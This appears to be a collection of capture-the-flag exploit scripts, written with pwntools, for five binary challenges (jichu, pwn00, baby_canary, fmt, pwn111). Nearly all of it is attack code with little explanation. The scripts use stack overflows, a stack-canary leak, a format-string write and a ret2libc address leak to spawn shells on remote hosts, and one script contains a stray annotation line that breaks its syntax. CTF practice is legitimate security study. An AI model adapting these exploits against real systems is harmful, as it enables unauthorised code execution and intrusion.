jichu

exp: 

from pwn import*
context.log_level='debug'

p=remote('172.18.0.1',10000)
#p=process('./jichu')
elf=ELF('./jichu')


sh=0x080482ea
system=elf.symbols['system']

payload='a'*0x48+'aaaa'+p32(system)+p32(0xdeadbeef)+p32(sh)

p.sendlineafter('Please input admin password:','administrator')
p.sendline('1')
p.sendlineafter('Please input new log info:',payload)
p.sendline('4')
p.sendline('cat flag')
p.interactive()

pwn00

exp:

 #coding=utf-8
from pwn import *
from LibcSearcher import*
context.log_level='debug'

if args['REMOTE']:
    p = remote('81.69.0.47',1000)
else:
    p = process("./pwn00")

pop_ret=0x0000000000400813
def main():
	p.recvuntil("Do you want to play with me?\n")
	payload='a'*0x70+'aaaaaaaa'+p64(pop_ret)+p64(0x4008B5)+p64(0x4007A2)
	p.sendline(payload)
	p.interactive()

if __name__ == '__main__':
	main()

baby_canary

 #coding=utf-8
from pwn import *
from LibcSearcher import*
context.log_level='debug'

if args['REMOTE']:
    p = remote('81.69.0.47',3333)
else:
    p = process("./baby_canary")

pop_rdi_ret=0x400873
# bin_sh=0x00000000004008ee
bin_sh=0x00000000004008ED
system=0x4007FC
def main():
	p.recvuntil('plz tell me.\n')
	payload='a'*0x68
	# gdb.attach(p)
	
	p.sendline(payload)
	p.recvuntil('a'*0x68)
	canary=u64(p.recv(8).ljust(8,"\x00"))-0xa
	print hex(canary)
	payload='a'*0x68+p64(canary)+p64(0)+p64(pop_rdi_ret)+p64(bin_sh)+p64(system)
	p.send(payload)
	# p.recv()

	p.interactive()

if __name__ == '__main__':
	main()

fmt

exp:

exp:
#coding=utf-8
from pwn import *
from LibcSearcher import*
context.log_level='debug'

if args['REMOTE']:
    p = remote('81.69.0.47', 2222)
else:
    p = process("./fmt")

elf=ELF('./fmt')
system=0x4012DB

system_plt=elf.plt['system']

def main():
	p.recvuntil('hello world!')
	bss=0x40409C
	payload='%'+str(0x1000)+'c%12$hn'+'%'+str(0x1000)+'c%13$hn'+'\x00'*8+p64(bss)+p64(bss+2)  //格式化字符串写入操作
		修改seed地址后两字节        修改seed地址前两字节                       两字节两字节修改的bss段安排
	# gdb.attach(p,'b *0x401261\nc\n')

	# gdb.attach(p)
	p.sendline(payload)
	sleep(1)
	a=['2121385791','1417272958','1222019344','189308997','2113086160','43315344','1978613629','710758478','1825758792','118621091','1330609383','97980547','203100239','120334289','1085921916','75582125']
	print(len(a))
	for i in range(0,len(a)):
		p.sendline(a[i])


	p.recvuntil("running sh")
	p.interactive()

if __name__ == '__main__':
	main()

pwn111

exp:

 #coding=utf-8
from pwn import *
from LibcSearcher import*
# context.log_level='debug'

if args['REMOTE']:
    p = remote('81.69.0.47', 1122)
else:
    p = process("./pwn111")


def main():
	libc=ELF('./libc')
	elf=ELF('./pwn111')
	pop_rbp_ret=0x000000000040112d
	pop_rdi_ret=0x0000000000401233
	write_plt=elf.plt['write']
	libc_start_main_got=elf.got['__libc_start_main']

	#libc中的基地址
	bin_sh_libc=next(libc.search("/bin/sh"))                     #0x0000000000180544
	system_libc=libc.symbols['system']
	print hex(bin_sh_libc)
	print hex(system_libc)

	#函数的偏移offset
	libc_start_main_offset=libc.symbols['__libc_start_main']

	p.recvuntil("please input: ")

	# gdb.attach(p)
	main=0x0000000000401146
	rsi_r15_ret=0x0000000000401231
	r14_r15_ret=0x0000000000401230
	payload1='a'*0x88+p64(pop_rdi_ret)+p64(1)+p64(rsi_r15_ret)+p64(libc_start_main_got)+p64(0)+p64(write_plt)+p64(main)

	p.sendline(payload1)


	#打印出write()函数在got表中的地址
	libc_start_main_add=u64(p.recv(6).ljust(8,"\x00"))

	print "libc_start_main_add="+hex(libc_start_main_add)
	offset=libc_start_main_add-libc_start_main_offset
	system_add=offset+system_libc
	bin_sh_add=offset+bin_sh_libc


	p.recv()
	payload2='a'*0x80+'a'*8+p64(pop_rdi_ret)+p64(bin_sh_add)+p64(system_add)
	p.sendline(payload2)
	p.interactive()

if __name__ == '__main__':
	main()